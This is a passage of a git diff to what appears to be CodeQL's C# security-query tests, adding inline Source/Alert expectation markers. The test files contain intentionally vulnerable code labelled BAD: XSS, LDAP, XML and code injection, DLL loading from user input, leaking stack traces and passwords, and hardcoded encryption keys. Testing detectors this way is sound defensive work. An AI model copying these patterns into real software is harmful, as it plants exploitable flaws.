context.Response.Write("Orders for " + customerReader.GetString(1)); + context.Response.Write("Orders for " + customerReader.GetString(1)); // $ Alert[cs/web/xss]=r1 } customerReader.Close(); } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-079/StoredXSS/StoredXSS.qlref b/csharp/ql/test/query-tests/Security Features/CWE-079/StoredXSS/StoredXSS.qlref index 89b5b951bdb6..a71d47846701 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-079/StoredXSS/StoredXSS.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-079/StoredXSS/StoredXSS.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-079/XSS.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-079/XSSAsp/XSS.cs b/csharp/ql/test/query-tests/Security Features/CWE-079/XSSAsp/XSS.cs index eba40b891d58..6db6b4fc4b68 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-079/XSSAsp/XSS.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-079/XSSAsp/XSS.cs @@ -23,10 +23,10 @@ public void WebUIXSS() { // BAD: Reading from textbox, then writing an amended value to a control that does not HTML encode StringBuilder userInput = new StringBuilder(); - userInput.AppendFormat("{0} test", categoryTextBox.Text); - calendar.Caption = userInput.ToString(); - table.Caption = userInput.ToString(); - label.Text = userInput.ToString(); + userInput.AppendFormat("{0} test", categoryTextBox.Text); // $ Source[cs/web/xss]=r1 $ Source[cs/web/xss]=r2 $ Source[cs/web/xss]=r3 + calendar.Caption = userInput.ToString(); // $ Alert[cs/web/xss]=r1 + table.Caption = userInput.ToString(); // $ Alert[cs/web/xss]=r2 + label.Text = userInput.ToString(); // $ Alert[cs/web/xss]=r3 // GOOD: Reading from textbox, then writing an amended value to a control that does HTML encode categoryTextBox.Text = userInput.ToString(); @@ -35,8 +35,8 @@ public void WebUIXSS() public void processRequest(HttpContext context) { // BAD: Read user input from a request, write it straight to a response - string name = context.Request.QueryString["name"]; - context.Response.Write(name); + string name = context.Request.QueryString["name"]; // $ Source[cs/web/xss]=r4 + context.Response.Write(name); // $ Alert[cs/web/xss]=r4 // GOOD: Read user input from a request, but encode it before writing to the response string name2 = context.Request.QueryString["name"]; @@ -55,9 +55,9 @@ public void processNumber(HttpContext context) public void mvcProcess(HttpContext context) { // BAD: Mimic what happens in cshtml pages - string name = context.Request.Unvalidated.QueryString["name"]; + string name = context.Request.Unvalidated.QueryString["name"]; // $ Source[cs/web/xss]=r5 HtmlHelper html = new HtmlHelper(null, null); - html.Raw(name); + html.Raw(name); // $ Alert[cs/web/xss]=r5 } public void listener(HttpContext context) @@ -73,27 +73,27 @@ public void listener(HttpContext context) public void contextBase(HttpContextBase context) { // BAD: Writing user input directly to a HttpListenerResponse - string name = context.Request.QueryString["name"]; - context.Response.Write(name); + string name = context.Request.QueryString["name"]; // $ Source[cs/web/xss]=r6 + context.Response.Write(name); // $ Alert[cs/web/xss]=r6 // BAD: Writing user input directly to a HttpListenerResponse - string name2 = context.Request["name"]; - context.Response.Write(name2); + string name2 = context.Request["name"]; // $ Source[cs/web/xss]=r7 + context.Response.Write(name2); // $ Alert[cs/web/xss]=r7 } public void htmlStrings(HttpContextBase context) { // BAD: Writing user input into a HtmlString without encoding - string name = context.Request.QueryString["name"]; - new HtmlString(name); - new MvcHtmlString(name); + string name = context.Request.QueryString["name"]; // $ Source[cs/web/xss]=r8 $ Source[cs/web/xss]=r9 + new HtmlString(name); // $ Alert[cs/web/xss]=r8 + new MvcHtmlString(name); // $ Alert[cs/web/xss]=r9 new MyHtmlString(context.Request); } public void WebContent(HttpContextBase context) { // BAD: Writing user input into a StringContent without encoding - string name = context.Request.QueryString["name"]; - new StringContent(name); + string name = context.Request.QueryString["name"]; // $ Source[cs/web/xss]=r10 + new StringContent(name); // $ Alert[cs/web/xss]=r10 } public void HtmlEncoded(HttpContextBase context) @@ -137,7 +137,7 @@ public MyHtmlString(HttpRequestBase request) public string ToHtmlString() { - return Request.RawUrl; + return Request.RawUrl; // $ Alert[cs/web/xss]=r11 $ Alert[cs/web/xss]=r11 } } } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-079/XSSAsp/XSS.qlref b/csharp/ql/test/query-tests/Security Features/CWE-079/XSSAsp/XSS.qlref index 89b5b951bdb6..a71d47846701 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-079/XSSAsp/XSS.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-079/XSSAsp/XSS.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-079/XSS.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-079/XSSAsp/script.aspx b/csharp/ql/test/query-tests/Security Features/CWE-079/XSSAsp/script.aspx index 5dd4830d7567..7581e301c02f 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-079/XSSAsp/script.aspx +++ b/csharp/ql/test/query-tests/Security Features/CWE-079/XSSAsp/script.aspx @@ -9,13 +9,13 @@ diff --git a/csharp/ql/test/query-tests/Security Features/CWE-079/XSSRazorPages/XSS.qlref b/csharp/ql/test/query-tests/Security Features/CWE-079/XSSRazorPages/XSS.qlref index e0b85b8f4c6b..553ccc892d04 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-079/XSSRazorPages/XSS.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-079/XSSRazorPages/XSS.qlref @@ -1 +1,2 @@ query: Security Features/CWE-079/XSS.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-090/LDAPInjection.cs b/csharp/ql/test/query-tests/Security Features/CWE-090/LDAPInjection.cs index ddd24e19729f..725d5bbe93c0 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-090/LDAPInjection.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-090/LDAPInjection.cs @@ -9,36 +9,36 @@ public class LDAPInjectionHandler : IHttpHandler { public void ProcessRequest(HttpContext ctx) { - string userName = ctx.Request.QueryString["username"]; + string userName = ctx.Request.QueryString["username"]; // $ Source[cs/ldap-injection]=r1 $ Source[cs/ldap-injection]=r2 $ Source[cs/ldap-injection]=r3 $ Source[cs/ldap-injection]=r4 $ Source[cs/ldap-injection]=r5 $ Source[cs/ldap-injection]=r6 // BAD: Filter includes user input without encoding - DirectorySearcher ds = new DirectorySearcher("accountname=" + userName); + DirectorySearcher ds = new DirectorySearcher("accountname=" + userName); // $ Alert[cs/ldap-injection]=r1 DirectorySearcher ds2 = new DirectorySearcher(); - ds.Filter = "accountname=" + userName; + ds.Filter = "accountname=" + userName; // $ Alert[cs/ldap-injection]=r2 // GOOD: Filter includes user input with encoding DirectorySearcher ds3 = new DirectorySearcher("accountname=" + LDAPEncode(userName)); // BAD: SearchRequest Filter includes user input without encoding SearchRequest sr = new SearchRequest(); - sr.Filter = "accountname=" + userName; - SearchRequest sr2 = new SearchRequest(null, "accountname=" + userName, System.DirectoryServices.Protocols.SearchScope.Base, null); + sr.Filter = "accountname=" + userName; // $ Alert[cs/ldap-injection]=r3 + SearchRequest sr2 = new SearchRequest(null, "accountname=" + userName, System.DirectoryServices.Protocols.SearchScope.Base, null); // $ Alert[cs/ldap-injection]=r4 // BAD: Distinguished Name includes user input without encoding - DirectoryEntry de = new DirectoryEntry("LDAP://Cn=" + userName); + DirectoryEntry de = new DirectoryEntry("LDAP://Cn=" + userName); // $ Alert[cs/ldap-injection]=r5 DirectoryEntry de2 = new DirectoryEntry(); - de2.Path = "LDAP://Cn=" + userName; + de2.Path = "LDAP://Cn=" + userName; // $ Alert[cs/ldap-injection]=r6 using (SqlConnection connection = new SqlConnection("")) { connection.Open(); SqlCommand customerCommand = new SqlCommand("SELECT * FROM customers", connection); - SqlDataReader customerReader = customerCommand.ExecuteReader(); + SqlDataReader customerReader = customerCommand.ExecuteReader(); // $ Source[cs/ldap-injection]=r7 while (customerReader.Read()) { // BAD: Read from database, write it straight to a response - DirectorySearcher ds4 = new DirectorySearcher("accountname=" + customerReader.GetString(1)); + DirectorySearcher ds4 = new DirectorySearcher("accountname=" + customerReader.GetString(1)); // $ Alert[cs/ldap-injection]=r7 } customerReader.Close(); } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-090/LDAPInjection.qlref b/csharp/ql/test/query-tests/Security Features/CWE-090/LDAPInjection.qlref index 06bd1eedc4f4..13eefd4645f9 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-090/LDAPInjection.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-090/LDAPInjection.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-090/LDAPInjection.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-091/XMLInjection/Test.cs b/csharp/ql/test/query-tests/Security Features/CWE-091/XMLInjection/Test.cs index f9dd6f3289e8..c394ed4b8cbb 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-091/XMLInjection/Test.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-091/XMLInjection/Test.cs @@ -5,14 +5,14 @@ public class XMLInjectionHandler : IHttpHandler { public void ProcessRequest(HttpContext ctx) { - string employeeName = ctx.Request.QueryString["employeeName"]; + string employeeName = ctx.Request.QueryString["employeeName"]; // $ Source[cs/xml-injection]=r1 using (XmlWriter writer = XmlWriter.Create("employees.xml")) { writer.WriteStartDocument(); // BAD: Insert user input directly into XML - writer.WriteRaw("" + employeeName + ""); + writer.WriteRaw("" + employeeName + ""); // $ Alert[cs/xml-injection]=r1 // GOOD: Escape user input before inserting into string writer.WriteRaw("" + SecurityElement.Escape(employeeName) + ""); diff --git a/csharp/ql/test/query-tests/Security Features/CWE-091/XMLInjection/XMLInjection.qlref b/csharp/ql/test/query-tests/Security Features/CWE-091/XMLInjection/XMLInjection.qlref index e39297fce167..96779d60ccb0 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-091/XMLInjection/XMLInjection.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-091/XMLInjection/XMLInjection.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-091/XMLInjection.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-094/CodeInjection.cs b/csharp/ql/test/query-tests/Security Features/CWE-094/CodeInjection.cs index e03bc9821f50..a557ebf4c724 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-094/CodeInjection.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-094/CodeInjection.cs @@ -20,13 +20,13 @@ public class CommandInjectionHandler : IHttpHandler { public void ProcessRequest(HttpContext ctx) { - string code = ctx.Request.QueryString["code"]; + string code = ctx.Request.QueryString["code"]; // $ Source[cs/code-injection]=r1 $ Source[cs/code-injection]=r2 CSharpCodeProvider c = new CSharpCodeProvider(); ICodeCompiler icc = c.CreateCompiler(); CompilerParameters cp = new CompilerParameters(); // BAD: Compiling unvalidated code from the user - CompilerResults cr = icc.CompileAssemblyFromSource(cp, code); + CompilerResults cr = icc.CompileAssemblyFromSource(cp, code); // $ Alert[cs/code-injection]=r1 System.Reflection.Assembly a = cr.CompiledAssembly; object o = a.CreateInstance("MyNamespace.MyClass"); @@ -37,7 +37,7 @@ public void ProcessRequest(HttpContext ctx) object s = mi.Invoke(o, null); // BAD: Use the Roslyn APIs to dynamically evaluate C# - CSharpScript.EvaluateAsync(code); + CSharpScript.EvaluateAsync(code); // $ Alert[cs/code-injection]=r2 } public bool IsReusable @@ -53,6 +53,6 @@ public bool IsReusable void OnButtonClicked() { // BAD: Use the Roslyn APIs to dynamically evaluate C# - CSharpScript.EvaluateAsync(box1.Text); + CSharpScript.EvaluateAsync(box1.Text); // $ Alert[cs/code-injection]=r3 $ Alert[cs/code-injection]=r3 } } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-094/CodeInjection.qlref b/csharp/ql/test/query-tests/Security Features/CWE-094/CodeInjection.qlref index 80eedc1b4c7c..53389dffbe49 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-094/CodeInjection.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-094/CodeInjection.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-094/CodeInjection.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-099/ResourceInjection.cs b/csharp/ql/test/query-tests/Security Features/CWE-099/ResourceInjection.cs index aed9219090a7..dc7666744383 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-099/ResourceInjection.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-099/ResourceInjection.cs @@ -5,12 +5,12 @@ public class ResourceInjectionHandler : IHttpHandler { public void ProcessRequest(HttpContext ctx) { - string userName = ctx.Request.QueryString["userName"]; + string userName = ctx.Request.QueryString["userName"]; // $ Source[cs/resource-injection]=r1 $ Source[cs/resource-injection]=r2 string connectionString = "server=(local);user id=" + userName + ";password= pass;"; // BAD: Direct use of user input in a connection string for the constructor - SqlConnection sqlConnection = new SqlConnection(connectionString); + SqlConnection sqlConnection = new SqlConnection(connectionString); // $ Alert[cs/resource-injection]=r1 // BAD: Direct use of user input assigned to a connection string property - sqlConnection.ConnectionString = connectionString; + sqlConnection.ConnectionString = connectionString; // $ Alert[cs/resource-injection]=r2 // GOOD: Use SqlConnectionStringBuilder SqlConnectionStringBuilder builder = new SqlConnectionStringBuilder(); builder["Data Source"] = "(local)"; diff --git a/csharp/ql/test/query-tests/Security Features/CWE-099/ResourceInjection.qlref b/csharp/ql/test/query-tests/Security Features/CWE-099/ResourceInjection.qlref index 5292de5ee84f..e2e487631687 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-099/ResourceInjection.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-099/ResourceInjection.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-099/ResourceInjection.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-112/MissingXMLValidation.cs b/csharp/ql/test/query-tests/Security Features/CWE-112/MissingXMLValidation.cs index 4ca87924c687..869b0731351f 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-112/MissingXMLValidation.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-112/MissingXMLValidation.cs @@ -9,22 +9,22 @@ public class MissingXMLValidationHandler : IHttpHandler public void ProcessRequest(HttpContext ctx) { - String userProvidedXml = ctx.Request.QueryString["userProvidedXml"]; + String userProvidedXml = ctx.Request.QueryString["userProvidedXml"]; // $ Source[cs/xml/missing-validation]=r1 $ Source[cs/xml/missing-validation]=r2 $ Source[cs/xml/missing-validation]=r3 $ Source[cs/xml/missing-validation]=r4 $ Source[cs/xml/missing-validation]=r5 // BAD: User provided XML is processed without any validation, // because there is no settings instance configured. - XmlReader.Create(new StringReader(userProvidedXml)); + XmlReader.Create(new StringReader(userProvidedXml)); // $ Alert[cs/xml/missing-validation]=r1 // BAD: User provided XML is processed without any validation, // because the settings instance does not specify the ValidationType XmlReaderSettings badSettings1 = new XmlReaderSettings(); - XmlReader.Create(new StringReader(userProvidedXml), badSettings1); + XmlReader.Create(new StringReader(userProvidedXml), badSettings1); // $ Alert[cs/xml/missing-validation]=r2 // BAD: User provided XML is processed without any validation, // because the settings instance specifies DTD as the ValidationType XmlReaderSettings badSettings2 = new XmlReaderSettings(); badSettings2.ValidationType = ValidationType.DTD; - XmlReader.Create(new StringReader(userProvidedXml), badSettings2); + XmlReader.Create(new StringReader(userProvidedXml), badSettings2); // $ Alert[cs/xml/missing-validation]=r3 // GOOD: User provided XML is processed with validation XmlReaderSettings goodSettings = new XmlReaderSettings(); @@ -42,7 +42,7 @@ public void ProcessRequest(HttpContext ctx) XmlSchemaSet sc2 = new XmlSchemaSet(); sc2.Add("urn:my-schema", "my.xsd"); goodSettings.Schemas = sc2; - XmlReader.Create(new StringReader(userProvidedXml), badSettings3); + XmlReader.Create(new StringReader(userProvidedXml), badSettings3); // $ Alert[cs/xml/missing-validation]=r4 $ Alert[cs/xml/missing-validation]=r5 } public bool IsReusable diff --git a/csharp/ql/test/query-tests/Security Features/CWE-112/MissingXMLValidation.qlref b/csharp/ql/test/query-tests/Security Features/CWE-112/MissingXMLValidation.qlref index 6f71112a01c1..3f8c9fe16878 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-112/MissingXMLValidation.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-112/MissingXMLValidation.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-112/MissingXMLValidation.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-114/AssemblyPathInjection/AssemblyPathInjection.qlref b/csharp/ql/test/query-tests/Security Features/CWE-114/AssemblyPathInjection/AssemblyPathInjection.qlref index 5979609654f9..f789023c52dc 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-114/AssemblyPathInjection/AssemblyPathInjection.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-114/AssemblyPathInjection/AssemblyPathInjection.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-114/AssemblyPathInjection.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-114/AssemblyPathInjection/Test.cs b/csharp/ql/test/query-tests/Security Features/CWE-114/AssemblyPathInjection/Test.cs index e0217a6d4866..8adba3f0dc84 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-114/AssemblyPathInjection/Test.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-114/AssemblyPathInjection/Test.cs @@ -4,10 +4,10 @@ public class DLLInjectionHandler : IHttpHandler { public void ProcessRequest(HttpContext ctx) { - string libraryName = ctx.Request.QueryString["libraryName"]; + string libraryName = ctx.Request.QueryString["libraryName"]; // $ Source[cs/assembly-path-injection]=r1 // BAD: Load DLL based on user input - var badDLL = Assembly.LoadFile(libraryName); + var badDLL = Assembly.LoadFile(libraryName); // $ Alert[cs/assembly-path-injection]=r1 // GOOD: Load DLL using fixed string var goodDLL = Assembly.LoadFile(@"C:\visual studio 2012\Projects\ConsoleApplication1\ConsoleApplication1\DLL.dll"); diff --git a/csharp/ql/test/query-tests/Security Features/CWE-201/ExposureInTransmittedData/ExposureInTransmittedData.cs b/csharp/ql/test/query-tests/Security Features/CWE-201/ExposureInTransmittedData/ExposureInTransmittedData.cs index e993bc368ae7..387c9959df59 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-201/ExposureInTransmittedData/ExposureInTransmittedData.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-201/ExposureInTransmittedData/ExposureInTransmittedData.cs @@ -11,26 +11,26 @@ public void ProcessRequest(HttpContext ctx) try { var password = "123456"; - ctx.Response.Write(password); // BAD + ctx.Response.Write(password); // BAD // $ Alert[cs/sensitive-data-transmission]=r1 $ Alert[cs/sensitive-data-transmission]=r1 } catch (System.Data.SqlClient.SqlException ex) { - ctx.Response.Write(ex.ToString()); // BAD + ctx.Response.Write(ex.ToString()); // BAD // $ Alert[cs/sensitive-data-transmission]=r2 $ Alert[cs/sensitive-data-transmission]=r2 } catch (DbException ex) { - ctx.Response.Write(ex.Message); // BAD - ctx.Response.Write(ex.ToString()); // BAD - ctx.Response.Write(ex.Data["password"]); // BAD + ctx.Response.Write(ex.Message); // BAD // $ Alert[cs/sensitive-data-transmission]=r3 $ Alert[cs/sensitive-data-transmission]=r3 + ctx.Response.Write(ex.ToString()); // BAD // $ Alert[cs/sensitive-data-transmission]=r4 $ Alert[cs/sensitive-data-transmission]=r4 + ctx.Response.Write(ex.Data["password"]); // BAD // $ Alert[cs/sensitive-data-transmission]=r5 $ Alert[cs/sensitive-data-transmission]=r5 } } void SendPasswordToEmail() { - var p = GetField("password"); // p is now tainted - var message = new MailMessage("from", "to", p, p); // BAD - message.Body = "This is your password: " + p; // BAD - message.Subject = p; // BAD + var p = GetField("password"); // p is now tainted // $ Source[cs/sensitive-data-transmission]=r6 $ Source[cs/sensitive-data-transmission]=r7 $ Source[cs/sensitive-data-transmission]=r8 $ Source[cs/sensitive-data-transmission]=r9 + var message = new MailMessage("from", "to", p, p); // BAD // $ Alert[cs/sensitive-data-transmission]=r6 $ Alert[cs/sensitive-data-transmission]=r7 + message.Body = "This is your password: " + p; // BAD // $ Alert[cs/sensitive-data-transmission]=r8 + message.Subject = p; // BAD // $ Alert[cs/sensitive-data-transmission]=r9 } string GetField(string field) diff --git a/csharp/ql/test/query-tests/Security Features/CWE-201/ExposureInTransmittedData/ExposureInTransmittedData.qlref b/csharp/ql/test/query-tests/Security Features/CWE-201/ExposureInTransmittedData/ExposureInTransmittedData.qlref index 9ce9ee5643ef..0c2eb8d2b2cc 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-201/ExposureInTransmittedData/ExposureInTransmittedData.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-201/ExposureInTransmittedData/ExposureInTransmittedData.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-201/ExposureInTransmittedData.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-209/ExceptionInformationExposure.cs b/csharp/ql/test/query-tests/Security Features/CWE-209/ExceptionInformationExposure.cs index 74b3fc4dd4d0..c9dc15fcce87 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-209/ExceptionInformationExposure.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-209/ExceptionInformationExposure.cs @@ -16,11 +16,11 @@ public void ProcessRequest(HttpContext ctx) catch (Exception ex) { // BAD: printing a stack trace back to the response - ctx.Response.Write(ex.ToString()); + ctx.Response.Write(ex.ToString()); // $ Alert[cs/information-exposure-through-exception]=r1 $ Alert[cs/information-exposure-through-exception]=r1 // BAD: implicitly printing a stack trace back to the response - ctx.Response.Write(ex); + ctx.Response.Write(ex); // $ Alert[cs/information-exposure-through-exception]=r2 $ Alert[cs/information-exposure-through-exception]=r2 // BAD: writing StackTrace property to response - ctx.Response.Write(ex.StackTrace); + ctx.Response.Write(ex.StackTrace); // $ Alert[cs/information-exposure-through-exception]=r3 $ Alert[cs/information-exposure-through-exception]=r3 // GOOD: writing Message property to response ctx.Response.Write(ex.Message); return; @@ -36,15 +36,15 @@ public void ProcessRequest(HttpContext ctx) log("Exception occurred", ex); ctx.Response.Write("Exception occurred"); - textBox.Text = ex.InnerException.StackTrace; // BAD - textBox.Text = ex.StackTrace; // BAD - textBox.Text = ex.ToString(); // BAD + textBox.Text = ex.InnerException.StackTrace; // BAD // $ Alert[cs/information-exposure-through-exception]=r4 $ Alert[cs/information-exposure-through-exception]=r4 + textBox.Text = ex.StackTrace; // BAD // $ Alert[cs/information-exposure-through-exception]=r5 $ Alert[cs/information-exposure-through-exception]=r5 + textBox.Text = ex.ToString(); // BAD // $ Alert[cs/information-exposure-through-exception]=r6 $ Alert[cs/information-exposure-through-exception]=r6 textBox.Text = ex.Message; // GOOD return; } // BAD: printing a stack trace back to the response for a custom exception - ctx.Response.Write(new MyException().ToString()); + ctx.Response.Write(new MyException().ToString()); // $ Alert[cs/information-exposure-through-exception]=r7 $ Alert[cs/information-exposure-through-exception]=r7 } class MyException : Exception diff --git a/csharp/ql/test/query-tests/Security Features/CWE-209/ExceptionInformationExposure.qlref b/csharp/ql/test/query-tests/Security Features/CWE-209/ExceptionInformationExposure.qlref index e8813fef7a81..295c9e8cc57b 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-209/ExceptionInformationExposure.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-209/ExceptionInformationExposure.qlref @@ -1,2 +1,4 @@ query: Security Features/CWE-209/ExceptionInformationExposure.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOff/MissingASPNETGlobalErrorHandler.qlref b/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOff/MissingASPNETGlobalErrorHandler.qlref index f496f14153c6..521ec9079e0e 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOff/MissingASPNETGlobalErrorHandler.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOff/MissingASPNETGlobalErrorHandler.qlref @@ -1 +1,2 @@ query: Security Features/CWE-248/MissingASPNETGlobalErrorHandler.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOff/Web.config b/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOff/Web.config index 768c965080c1..d04829109d33 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOff/Web.config +++ b/csharp/ql/test/query-tests/Security Features/CWE-248/MissingASPNETGlobalErrorHandler/WebConfigOff/Web.config @@ -2,6 +2,6 @@ - + diff --git a/csharp/ql/test/query-tests/Security Features/CWE-321/HardcodedSymmetricEncryptionKey/HardcodedSymmetricEncryptionKey.cs b/csharp/ql/test/query-tests/Security Features/CWE-321/HardcodedSymmetricEncryptionKey/HardcodedSymmetricEncryptionKey.cs index 0c9c58d0d230..ff8600b85a81 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-321/HardcodedSymmetricEncryptionKey/HardcodedSymmetricEncryptionKey.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-321/HardcodedSymmetricEncryptionKey/HardcodedSymmetricEncryptionKey.cs @@ -14,21 +14,21 @@ static void Main(string[] args) var a = new AesCryptoServiceProvider(); // BAD: explicit key assignment, hard-coded value - a.Key = new byte[] { 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 }; + a.Key = new byte[] { 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 }; // $ Alert[cs/hardcoded-key]=r1 $ Alert[cs/hardcoded-key]=r1 var b = new AesCryptoServiceProvider() { // BAD: explicit key assignment, hard-coded value - Key = new byte[] { 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 } + Key = new byte[] { 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 } // $ Alert[cs/hardcoded-key]=r2 $ Alert[cs/hardcoded-key]=r2 }; - var c = new byte[] { 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 }; + var c = new byte[] { 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 }; // $ Source[cs/hardcoded-key]=r3 $ Source[cs/hardcoded-key]=r4 $ Source[cs/hardcoded-key]=r5 $ Source[cs/hardcoded-key]=r6 var d = c; - var byteArrayFromString = Encoding.UTF8.GetBytes("Hello, world: here is a very bad way to create a key"); + var byteArrayFromString = Encoding.UTF8.GetBytes("Hello, world: here is a very bad way to create a key"); // $ Source[cs/hardcoded-key]=r7 // BAD: key assignment via variable, from hard-coded value - a.Key = d; + a.Key = d; // $ Alert[cs/hardcoded-key]=r3 // GOOD (not really, but better than hard coding) a.Key = File.ReadAllBytes("secret.key"); @@ -65,7 +65,7 @@ public static string Decrypt(byte[] cipherText, byte[] password, byte[] IV) { using (MemoryStream ms = new MemoryStream()) { - using (CryptoStream cs = new CryptoStream(ms, aes.CreateDecryptor(password, IV), CryptoStreamMode.Write)) + using (CryptoStream cs = new CryptoStream(ms, aes.CreateDecryptor(password, IV), CryptoStreamMode.Write)) // $ Alert[cs/hardcoded-key]=r4 { cs.Write(cipherText, 0, cipherText.Length); } @@ -105,7 +105,7 @@ static SymmetricAlgorithm CreateProvider(byte[] key) return new AesManaged() { // BAD: assignment from parameter - Key = key + Key = key // $ Alert[cs/hardcoded-key]=r5 }; } @@ -118,7 +118,7 @@ public static byte[] Encrypt(string plaintext, byte[] key, byte[] IV) using (MemoryStream ms = new MemoryStream()) { // BAD: flow of hardcoded key to CreateEncryptor constructor - using (CryptoStream cs = new CryptoStream(ms, aes.CreateEncryptor(key, IV), CryptoStreamMode.Write)) + using (CryptoStream cs = new CryptoStream(ms, aes.CreateEncryptor(key, IV), CryptoStreamMode.Write)) // $ Alert[cs/hardcoded-key]=r6 $ Alert[cs/hardcoded-key]=r7 { cs.Write(rawPlaintext, 0, rawPlaintext.Length); } diff --git a/csharp/ql/test/query-tests/Security Features/CWE-321/HardcodedSymmetricEncryptionKey/HardcodedSymmetricEncryptionKey.qlref b/csharp/ql/test/query-tests/Security 